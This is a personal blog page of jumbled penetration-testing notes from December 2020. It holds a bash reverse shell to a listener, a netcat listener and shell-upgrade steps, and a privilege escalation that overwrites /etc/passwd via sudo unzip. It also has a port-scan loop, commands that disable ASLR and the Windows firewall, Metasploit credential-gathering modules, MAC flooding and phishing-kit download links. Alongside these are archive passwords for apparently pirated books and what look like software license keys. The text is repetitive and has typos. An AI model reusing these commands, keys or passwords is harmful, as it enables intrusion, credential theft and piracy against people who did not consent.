Sinister Geek: December 2020

Wednesday, December 23, 2020

JUNK NOTE

xterm-256color

https://drive.google.com/drive/folders/1wvvVQRapOn9860_ETKz9RQDEXh1hVUtx?usp=sharing

bash -c 'bash -i >& /dev/tcp/192.168.1.7/1234 0>&1'
python -c 'import pty; pty.spawn("/bin/bash")'
tty
Ctrl + Z
echo $TERM
stty -a
stty raw -echo
fg
nc -nlvp 1234
<here You spawn the nc session again by typing by nc -lvnp 445

reset
xterm

export SHELL=bash
export TERM=xterm256-color
stty rows 37 colums 146
bash -i

export TERM=linux
-->
zip passwd.zip passwd
sudo -u root unzip -o passwd.zip -d /etc/passwd
--

openssl passwd geek

$nc 192.168.1.6 56563

OSWE's syllabus: https://www.offensive-security.com/do... Repository of s0j0hn: https://github.com/s0j0hn/AWAE-OSWE-Prep wetw0rk: https://github.com/wetw0rk/AWAE-PREP Links: https://www.linkedin.com/in/syedumara... https://twitter.com/syed__umar https://github.com/Anon-Exploiter Site/Side project: https://umar0x01.sh https://pentestlabs.gitbook.io

###Tools### windows-privesc-check https://github.com/pentestmonkey/wind... Windows Exploit Suggester https://github.com/AonCyberLabs/Windo... MSF Exploit Suggester post/multi/recon/local_exploit_suggestor BeRoot https://github.com/AlessandroZ/BeRoot JAWS ( Just Another Windows Enum Script) https://github.com/411Hall/JAWS

-----Disable ASLR---------
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
-----Disable stack protector-------
gcc -fno-stack-protector -z execstack

File Password: linuxia.ir
All Book Password: @Hide01

File Password For 2020 Version: hide01.ir

File Password For 2019 Version: @sanspentest

Password For Open Books In Archives: @Hide01

darkOp: dsoftw

File Password: @Hide01-@OffSecPack
All Book Password: @Hide01

------------------

Password: dl.linuxia.ir

actux

------------------------------

File Password: @sanspentest All Book Password: @Hide01

2F3R0-FHED2-M80TY-BQYGC-NPKYF YF398-0HF8P-M81RQ-2DXQE-MZUT6 ZF71R-DMX85-08DQY-8YMNC-PPHV8 ZF3R0-FHED2-M80TY-8QYGC-NPKYF YF390-0HF8P-M81RQ-2DXQE-M2UT6 ZF71R-DMX85-08DQY-8YMNC-PPHV8 AZ3E8-DCD8J-0842Z-N6NZE-XPKYF FC11K-00DE0-0800Z-04Z5E-MC8T6

#!/bin/bash
host=l0.5.5.ll
for port in {l .. 65535}; do
timeout .1 bash -c "echo >/dev/tcp/$host/$port" &&
echo "port $port is open"
done
echo "Done"

https://ctfchallenge.com/login

https://thehackerish.com/

---------------------

hascat error

sudo rm -rf ~/.hashcat/sessions/hashcat.pid

VBoxManage modifyvm "macos" --cpuidset 00000001 000106e5 00100800 0098e3fd bfebfbff
VBoxManage setextradata "macos" "VBoxInternal/Devices/efi/0/Config/DmiSystemProduct" "iMac11,3"
VBoxManage setextradata "macos" "VBoxInternal/Devices/efi/0/Config/DmiSystemVersion" "1.0"
VBoxManage setextradata "macos" "VBoxInternal/Devices/efi/0/Config/DmiBoardProduct" "Iloveapple"
VBoxManage setextradata "macos" "VBoxInternal/Devices/smc/0/Config/DeviceKey" "ourhardworkbythesewordsguardedpleasedontsteal(c)AppleComputerInc"
VBoxManage setextradata "macos" "VBoxInternal/Devices/smc/0/Config/GetKeyFromRealSMC" 1

db_connect -y /usr/share/metasploit-framework/config/database.yml

download.phishing-server.com/dl/lucy-latest/virtualbox.zip
download.phishing-server.com/dl/lucy-latest/esxi.ova
download.phishing-server.com/dl/lucy-latest/vmware.zip
download.phishing-server.com/dl/lucy-latest/install.sh

macof -i wlan0 -n 15

-----Disable the firewall-----------

netsh firewall set opmode disable

-----------------------------------------------------

metasploit post exploitation phase

====================

run post/windows/gather/credentials/credntial_collector
run post/windows/gather/dumplinks
run post/windows/gather/enum_applications
run post/multi/recon/local_exploit_suggester
run /post/windows/gather/usb_history
run event_manager -i
run event_manager -c

----------------------------------------------------

win Packet Scan for Enumeratio of Access Control List

------------------------------------------------------
nmap -sW -O -PI -PT <URL or IP>
nmap -sV -Pn -T4 -vv 192.168.1.1

----------------------------------------

Super Network Tunnel
HTTPTunnel
HTTPORT
HTTHOST

Tuesday, December 22, 2020

adsadas

Perl

perl -e 'exec "/bin/sh";'

1	perl -e 'exec "/bin/sh";'

Simple Shells to Fully Interactive TTYs

1. Python to spawn a PTY

$ python -c 'import pty; pty.spawn("/bin/bash")'
        or
$ python3 -c 'import pty; pty.spawn("/bin/bash")'

$ python -c 'import pty; pty.spawn("/bin/bash")'

$ python3 -c 'import pty; pty.spawn("/bin/bash")'

2. Put the shell in to background with Ctrl-Z

$ Ctrl-Z

$ Ctrl-Z

3. Examine the current terminal and STTY info and match it

# echo $TERM
# stty -a

1 2	# echo $TERM # stty -a

The information needed is the TERM type (“xterm-256color”) and the size of the current TTY (“rows 37; columns 146”)

4. Set the current STTY to type raw and tell it to echo the input characters

 # stty raw -echo

1	# stty raw -echo

5. Foreground the shell with fg and re-open the shell with reset

# fg
   reset

1 2	# fg reset

6. stty size to match our current window

$ export SHELL=bash
$ export TERM=xterm256-color
$ stty rows 37 columns 146
$ bash -i

$ export SHELL=bash

$ export TERM=xterm256-color

$ stty rows 37 columns 146

$ bash -i

7. Set PATH TERM and SHELL if missing

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
$ export TERM=xterm
$ export SHELL=bash
$ cat /etc/profile; cat /etc/bashrc; cat ~/.bash_profile; cat ~/.bashrc; cat ~/.bash_logout; env; set
$ export PS1='[\u@\h \W]\$ '

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

$ export TERM=xterm

$ export SHELL=bash

$ cat /etc/profile; cat /etc/bashrc; cat ~/.bash_profile; cat ~/.bashrc; cat ~/.bash_logout; env; set

$ export PS1='[\u@\h \W]\$ '